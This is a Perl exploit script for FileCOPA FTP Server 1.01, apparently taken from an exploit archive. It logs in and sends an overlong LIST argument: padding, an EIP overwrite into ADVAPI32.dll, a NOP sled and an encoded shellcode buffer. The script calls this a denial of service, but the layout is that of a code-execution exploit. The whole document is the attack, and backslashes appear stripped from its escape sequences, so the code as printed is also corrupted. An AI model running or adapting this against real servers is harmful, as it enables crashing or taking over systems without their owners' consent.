FileCOPA FTP Server version 1.01 denial of service exploit.
#!/usr/bin/perl
#
# e-mail: fernando.mengalli@gmail.com
#
# Date: 04/06/2021
#
# Version Vulnerable: FileCOPA FTP Server 1.01
#
# OS Tested: Windows XP PACK 3 Brazilian e Windows 2000
#
# Youtube video: https://youtu.be/A9cEoyY9Bd4
#
# badchars x00 x0a
use Net::FTP;
use Term::ANSIColor;
$sis="$^O";
print $sis;
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
if ((!$ARGV[0]) || (!$ARGV[1])) {
&apresentacao();
}
sub apresentacao {
print q {
######################################################
# #
# [*] FileCOPA FTP Server 1.01 - Denied of Service #
# #
# [*] Author: Fernando Mengali #
# #
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #
# #
################# Code Exploit #######################
}
}
our $alvo = $ARGV[0];
our $porta = $ARGV[1];
if (!$ARGV[0] && !$ARGV[1]) {
exit;
}
if($alvo !~ /(d{1,3}.d{1,3}.d{1,3}.d{1,3})/) {
print color('red bold');
print " nn [-] Por favor, defina o IP alvo! nn";
color('reset');
exit;
}
if($porta < 0 || $porta > 65535) {
print color('red bold');
print " nn [-] Por favor, defina uma porta de 1 a 65535! nn";
color('reset');
exit;
}
print color('green bold');
print "nnAlvo definido =>" .$alvo . " n n";
print "Porta definida =>" .$porta . "nn";
color('reset');
print color('yellow bold');
print "[+] Por favor, informe a nome de usuário: ";
color('reset');
print color('red bold');
my $usuario = <stdin>;
chomp($usuario);
color('reset');
print color('yellow bold');
print "[*] Por favor, informe a senha de acesso: ";
color('reset');
print color('red bold');
my $senha = <stdin>;
chomp($senha);
color('reset');
my $buf =
"xbax17x61x66xafxdbxd9xd9x74x24xf4x5dx2bxc9" .
"xb1x60x31x55x12x83xedxfcx03x42x6fx84x5axb7" .
"xa9xf0x15x7bxd9xfbx8fxf7x01x08x75xdcx80x41" .
"xd3x13x51xbaxe7x11x4dx39x25x21xb3x27x8bx30" .
"xefxf1xacxbdx95xe9xcfx1ax1dxb9xe1xf6x27x0b" .
"xffx02x98xc0xf6xc7x19x52xc4x94x18xdbx56x20" .
"xb6x9axc4xb5xecxf3x40xd4x19x17x6dx35x50x3a" .
"x13xc3xb3xf0x38x8dxffxc5x05x55x33xe7xd2x9e" .
"xb6x8cx9bx79xcex8fxd6x30x72x12x62x26x3exed" .
"xefxdax23x88x07x74xdcxbexe1xc4x3ex91x8ax26" .
"x3ax3fx2bxf2xe5x3ax18x0fxd0x8dx7bxbaxf3xba" .
"x2bx5bxa5x2dx54xaax88x68x4bxf4xccx24x68xc1" .
"x19x22xf9x08xd6x08x8fx4axe0x7dx67xc1x4exd8" .
"x08x34x44x2bx6ax6fx41x6dx53x26x73x9dxb4xca" .
"x87xedxe6x2dx8bx1cx42x0exb3x20xd0xa1x48x97" .
"x45x46x26x6bxe7x74x52xc1xaex2dx8dx1ax06xe0" .
"x24x26xbexfex26xf8x48x75x73x5dx6cx67xebxf4" .
"xf4x08x91xf8x5fx4ax3axd4x5cxd4x7cx52x13xa5" .
"x08x06xc9x8bx04x9ax0fxe5xe8x1fxefx28x3bxe9" .
"x6exf9xeex7exf0x5cx5ex4fx95x49x0fx83xf0x70" .
"x09xf6x83xe9x43xb8xe0x88x51x6ex9cx5dx48x5b" .
"x9bxcax9axf1x48xa8x51x22x61x12x55xfex10x16" .
"xb5x42x42xffx15x14x3fx44x9bx92xfcxd9x67xe0" .
"x15xd1x64xcex75xecxa3x08x03x61x4ax3bx0ex5a" .
"xb0x7bxe6x2cxacxaex5dxadx71xf5xb8xc4x4fxd3" .
"xf4x40x2bx92x75x83xe3x0fx4cx23x78x72x0fx22" .
"xb9x10xa6x1dxc9xcbxcaxe5x61xf8x5fx64x86x49" .
"x5bxb2x9ex75x30xc6x6ex3cx9ax02xadx03x36x29" .
"xafx84x62x98x22xcdxbfx7exa2x14x97x75xa2xc3" .
"xab";
$offset = "x41"x320;
$NOPS= "x90"x3105;
$JMP = "xe9xbfx2cxb0xff"; # jmp para endereco de memória
$EIP= "x93x79x2ex7c"; # Aqui o jmp na biblioteca ADVAPI32.dll
$payload = $offset . $EIP . $NOPS . $JMP . $buf . "rn";
print color('cyan');
print "nn[+] Conectando para o servidor " . $alvo . ":" . $porta."... n";
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die
color('red')."n[-] Não foi possível conectar. n";
sleep(2);
print "[+] Conectado!n";
sleep(2);
$ftp->login($usuario,$senha) || die color('red')."n [-] Não pode conectar
ou você derrubou: $!";
print "[+] Autenticando...n";
sleep(2);
print "[+] Autenticado com sucesso!nn";
sleep(2);
print "[*] Sobrecarregando o servidor...nn";
sleep(2);
$ftp->command("LIST A", $payload);
color('reset');
print color('green bold');
print "[+] Servidor fora do ar!n";
color('reset');
exit(0);
